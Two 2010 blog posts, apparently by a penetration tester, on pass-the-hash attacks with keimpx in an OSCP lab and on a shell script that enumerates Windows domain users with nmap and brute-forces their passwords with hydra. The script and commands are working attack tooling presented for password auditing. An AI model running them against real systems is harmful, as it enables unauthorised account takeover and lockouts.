Thursday, 25 November 2010

"Pass the hash, man!"

Whilst working my way through offensive security's excellent OCSP course, I found myself accumulating a fair amount of dumped hashes from some of the servers in the lab network. Most of the hashes were easy work for ophcrack, thanks to them being stored in LanMan format. However, most of the admin level passwords were over 14 characters, so were stored  in the much more secure NThash form.

There was no way of getting a hold of a rainbow table that holds passwords of this length, and all the dictionaries I had failed miserably.

Time to try another way....

First off, Metasploit provides a pass-the-hash method by way of the psexec module. This works well, but unfortunately only allows a single hash to be inputted.

Then I found Keimpx available here.

This tool proved to be a godsend. Simply paste all your hashes in the default pwdump friendly format, plus any username passwords combinations (format is username<single_space>password) into a txt file and enter the following command:-                                             
./keimpx -c hashes.txt -l targets.txt -v 2

This tool will then try all the passwords and un-cracked hashes against the targets and provide a simple output explaining which passwords worked on which machines. Fantastic!
Even better, it goes on to ask you which of the cracked machines you would like keimpx to open up a shell on!
So..... I urge you all to give it a try. The example pages on the link give you all the info you will need.

Sunday, 26 September 2010

Fast password auditing with nmap and hydra

I have been spending a lot of time with some of the nmap scripts recently, particularly the smb-brute and enum-users scripts. These work fine but I wanted to be able to have my own custom password list which I could fine-tune according to the target company, and also to the UK (i.e. to include football teams, companyname123, etc).

The smb-enum-users script is the best way I've found to pull usernames from a domain controller, so this is a good place to start. However, the output requires a bit of cleaning before I can use it for piping into hydra. Yes, smb-brute will do most of this, but I wanted to have a bit more control on things.

After a few hours spent learning the grep, cut and sed commands, I finally managed to produce a fairly clean user list, without all the computer accounts and other characters that I didn't require. This is then piped into hydra with the correct parameters to produce a nice output of cracked accounts. A few lines later and it becomes a simple yet effective program with which to quickly audit domain accounts.

I am new to shell scripting, so I'm betting this could be done in a much better way. Anyway, let me know if you find it as useful as I do.

echo "*******************************************************"
echo "*                                                     *"
echo "*  Welcome to the Domain Account Bruteforce Tool.     *"
echo "*             By Sean gambles 21st Sep 2010           *"
echo "*******************************************************"
echo "This tool makes use of the nmap smb-enum-users script,"
echo "by basically exporting the results, in a cleaned up form"
echo "into hydra for bruteforcing."
echo "Currently, only working with server 2000, 2003 family."
echo "This is due to server 2008 not allowing unauthenticated"
echo "account enumeration."
echo "*** Please observe account lockout thresholds before"
echo "submitting your password file into this tool, as there"
echo "is no protection against lockouts taking place. ***"
read -p "Please enter the target server IP :" target
echo "Please enter the path to your password file"
read -p "E.g /root/passwords.txt :" passfile
echo "Enumerating users, please wait...."
nmap -p139,445 -n $target --script=smb-enum-users |grep Users |cut -d":" -f3 |tr "," "\n" |tr -d "^ " |grep -v
\\"$" >/tmp/users.txt
echo "The following accounts have been found:"
cat /tmp/users.txt
read -p "Press enter to start cracking the accounts."
echo "Trying passwords against all the user accounts, please wait...."
hydra $target smbnt -s445 -L /tmp/users.txt -P $passfile -t1 -e n -m D >/tmp/results.txt
rm /tmp/users.txt
echo "*********************************************************"
echo "Domain accounts found :"
cat /tmp/results.txt |grep login |cut -d" " -f6-11
rm /tmp/results.txt